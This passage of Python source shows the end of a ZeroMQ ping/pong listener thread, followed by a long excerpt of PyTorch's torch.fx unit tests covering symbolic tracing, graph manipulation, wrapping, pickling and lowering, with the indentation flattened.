threading.Thread(target = self.ThreadProcess, args=(subPort, session, objZMQ)).start()
self.IsTerminal = False
def Close(self):
self.IsTerminal = True
def ThreadProcess(self, subPort, session, objZMQ):
socket_sub = zmq.Context().socket(zmq.SUB)
socket_sub.connect("tcp://127.0.0.1:%s" % subPort)
socket_sub.setsockopt_string(zmq.SUBSCRIBE,"")
while True:
message = (socket_sub.recv()[:-1]).decode("utf-8")
findText = re.search("{\"DataType\":\"PING\"}",message)
if findText == None:
continue
if self.IsTerminal:
return
objZMQ.Pong(session, "TC")
|
test_fx.py
|
import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import operator
import os
import pickle
import sys
import torch
import traceback
import typing
import types
import warnings
import unittest
from math import sqrt
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
import torch.utils._pytree as pytree
import torch.fx._pytree as fx_pytree
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH
import torch._C._fx
from torch.fx.node import Target, Argument
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from collections import namedtuple
from torch.fx.proxy import TraceError
from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import AnnotationsTest # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import TypeCheckerTest # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Set, Tuple, Union
from torch.testing._internal.common_utils import (
IS_FBCODE,
IS_MACOS,
IS_WINDOWS,
TEST_WITH_ROCM,
find_library_location,
run_tests,
)
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision import models as torchvision_models
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Used for test_autowrap_function. Autowrapped functions need to be global
def fx_int(x: float) -> int:
return int(x)
def fx_int_x2(x: float) -> int:
return int(x) * 2
# used in test_pytree. It's all the way out here because pickling a GraphModule
# that uses Point errors out if Point is local to the function
Point = namedtuple('Point', ['x', 'y'])
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
wrap('getattr')
@wrap
def wrapped_via_decorator(a):
return a + 1
wrap('wrapped_with_submodule')
def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
return batchnorm1d(x)
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
# for testing pytrees
class Foo(object): # noqa: B209
def __init__(self, a, b):
self.a = a
self.b = b
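# Illustrative sketch (editor's addition): the basic symbolic_trace round trip that the
# tests below exercise -- trace a module, lint the traced graph, and check the
# GraphModule against the eager module.
def _trace_round_trip_example():
    m = SimpleTest()
    gm = symbolic_trace(m)      # GraphModule with an explicit torch.fx Graph
    gm.graph.lint()             # sanity-check the traced graph
    x = torch.rand(3, 4)
    return torch.equal(gm(x), m(x))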
class TestFX(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS):
lib_file_path = find_library_location('libtorchbind_test.so')
torch.ops.load_library(str(lib_file_path))
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
# test for issue described at https://github.com/pytorch/pytorch/issues/63883
class M3(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
m3 = M3()
gm3 = symbolic_trace(m3)
new_instance = gm3.__new__(type(gm3))
new_instance.__init__(gm3, gm3.graph)
x = torch.randn(5, 3)
torch.testing.assert_allclose(new_instance(x), torch.relu(x))
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_fx_and_or(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x & x, x | x
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_matmul_tracing(self):
const = torch.randn(3)
def matmul_f(x):
return x @ const
mod = symbolic_trace(matmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), matmul_f(inp))
def rmatmul_f(x):
return const @ x
mod = symbolic_trace(rmatmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), rmatmul_f(inp))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(m).transform()
self.assertIn('wrapped_via_decorator', transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
m = symbolic_trace(M())
self.assertIn("wrapped_with_submodule", m.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), m(input))
def test_wrapped_retrace(self):
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
retraced = symbolic_trace(m)
self.assertIn('wrapped_via_decorator', retraced.code)
self.assertEqual(retraced(0), 1)
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
for node in graph.nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
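# For example (illustrative names only), a graph computing out = x * 3.0 would
# lower to a single instruction ("mul", ["x", "constant_0"], "mul_out"), with
# constant_0 registered separately through add_constant() below.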
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, f"Unsupported call target {target}"
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the specified return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
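# Roughly, the hand-built graph below corresponds to a forward of the form
#   def forward(self, <fn_input_names...>):
#       return self.interpreter.__call__([<fn_input_names...>])
# (a sketch only; the real graph is assembled node-by-node)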
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_close(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_close(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_close(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_tensor_attribute_coalseced(self):
def count_attrs(fx_module):
targets = set()
for node in fx_module.graph.nodes:
if node.op == 'get_attr':
targets.add(node.target)
return len(targets)
val = torch.tensor(5)
def f(x):
return x + val + val
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 1)
val2 = torch.tensor(5)
def f(x):
val = torch.tensor(5)
return x + val + val2
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 2)
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_deepcopy_graph_with_tracer_cls(self):
class TestTracer(Tracer):
def is_leaf_module(self, module, name):
return True
g = Graph(tracer_cls=TestTracer)
x = g.placeholder("x")
g.output(x)
h = copy.deepcopy(g)
self.assertIsNotNone(h._tracer_cls)
self.assertTrue(g._tracer_cls == h._tracer_cls)
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_autowrap_functions(self):
class AutowrapFnTest(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2)
class AutowrapFnTest2(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2)
# Check function(s) are wrapped
# `int` would normally throw a TypeError because its argument can't be a `Proxy`
tracer = Tracer(autowrap_functions=(fx_int,))
graph = tracer.trace(AutowrapFnTest())
traced = GraphModule(tracer.root, graph, 'test')
tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2))
tracer_2.trace(AutowrapFnTest2())
# Test scriptability
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(4)), 2)
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_torch_fx_getattr(self):
class FXGetattrTest(torch.nn.Module):
def forward(self, x):
return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3]))
traced = symbolic_trace(FXGetattrTest())
self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3]))
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_custom_proxy_type(self):
class TensorPair:
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair(x : TensorPair, y : TensorPair):
s = x.add(y)
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair(x, y)
traced = symbolic_trace(use_tensor_pair)
traced_out = traced(x, y)
